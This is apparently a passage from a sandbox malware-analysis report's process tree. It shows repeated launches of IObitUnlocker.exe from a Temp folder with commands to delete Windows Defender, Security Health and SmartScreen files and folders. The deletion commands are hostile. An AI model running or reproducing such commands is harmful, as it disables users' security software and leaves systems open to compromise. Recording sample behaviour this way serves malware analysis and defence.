Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8424
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
